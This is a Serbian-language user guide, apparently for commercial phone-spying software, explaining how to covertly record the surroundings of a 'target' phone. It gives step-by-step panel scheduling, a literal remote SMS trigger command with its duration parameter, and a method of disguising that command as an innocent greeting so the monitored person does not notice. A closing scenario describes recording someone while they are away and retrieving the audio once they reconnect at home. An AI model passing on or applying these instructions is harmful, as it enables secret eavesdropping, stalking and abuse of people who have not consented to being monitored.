Zakazivanje Snimanja Okoline


Ako niste u mogućnosti da uživo slušate target telefon možete da zakažete snimanje okoline telefona.

 

Okolina telefona se snima na dva načina:

 

  • Zakazovanjem snimanja preko panela
  • Daljinske SMS komande

 

Zakazivanje snimanja na panelu

 

Izaberite iz menija opciju Zakazivanje.

 

Izaberite ikonicu Capture Audio da bi snimali zvuk u okolini telefona

 

U polje Duration unesite broj sekundi koliko dugo bi želeli da snimate, maksimum 600 sekundi (10 minuta).

 

Na kalendaru izaberite datum i vreme kada tačno želite da počne snimanje.

 

Klinite Save.

 

zakazivanje snimanja

 

Izmedju dva zakazivanja praviti najmanje 5 minuta pauze.

Target telefon mora da bude na internetu da bi ovakvo snimanje radilo.

 

Daljinske SMS komande

 

SMS komande služe da se daljinski uključi špijunska funkcija programa za praćenje mobilnog na target telefonu.

 

Za slanje komandi se koriste klasične sms poruke i mogu se poslati sa bilo kog broja. Ove poruke se vide na ekranu target telefona kao i bilo koja druga sms poruka.

 

Pošaljete na target telefon sms koji glasi x9f9p9 AC900

 

Slanjem ovog sms-a rekli ste spy programu da uživo snima okruženje target telefona 900 sekundi (15 minuta) od trenutka prijema komande.

Ako želite neki drugi interval snimanja, samo promenite broj 900 u željeni interval u sekundama (ali ne prelazite 900). Na primer, ako želite 600 sekundi šaljete komandu x9f9p9 AC600.

 

Snimak možete preslušati na panelu u rubrici Zakazivanje.

 

Aliasi – nevidljive SMS komande

 

Moguće je napraviti da se SMS komande ne vide na ekranu target telefona uz pomoć aliasa.

 

Alias pretstavlja tekst koji će se pojaviti na ekranu umesto sms komande.

Na primer možete napraviti da kada pošaljete SMS poruku „Cao kako si“ target telefon uključi snimanje okoline isto kao da ste poslali komandu x9f9p9 AC900.

 

Evo kako se to radi:

 

Izaberite iz menija Tekstualne komande.

 

  • U pravougaoniku 1) upište sms komandu koju želite da se izvrši
  • U pravougaoniku 2) napišite reč koju želite da izadje na ekranu
  • Kliknite na Save.

 

sms komande

 

Primer:

 

Želimo da uvek kada osobi pošaljemo sms poruku koja sadrži reč Cao program za praćenje mobilnog počne da snima okolinu telefona narednih 600 sekundi to bi izgledalo kao na slici dole.

 

sms komande 2

 

Na panelu možete snimiti više različitih komandi i one će se prikazati na listi

 

sms komande 3

 

Možete zadati do 3 aliasa za istu komandu.

Klikom na X brišete zadatu komandu.

 

Važno: Može da prodje i do 24h dok se komanda ne snimi na serveru, tako da nemojte odmah po snimanju komande da je koristite.

 

Primena u praksi

 

Na primer target telefon nema pristup internetu preko paketa na kartici već samo kada je kod kuće povezan na WiFi mrežu.

U tom slučaju ako se osoba nalazi u gradu vi onda nemate mogućnost slušanja uživo okoline telefona.

 

Tada možete da koristite sms komande. Pošaljete sms poruku sa zadatim aliasom i kada osoba dodje kući i poveže se na WiFi mrežu preslušate sve što je snimljeno.

 

Ako se desi da target telefon ima lošiju internet vezu u trenutku kada pokuša da isporuči snimak nećete dobiti ništa na panelu.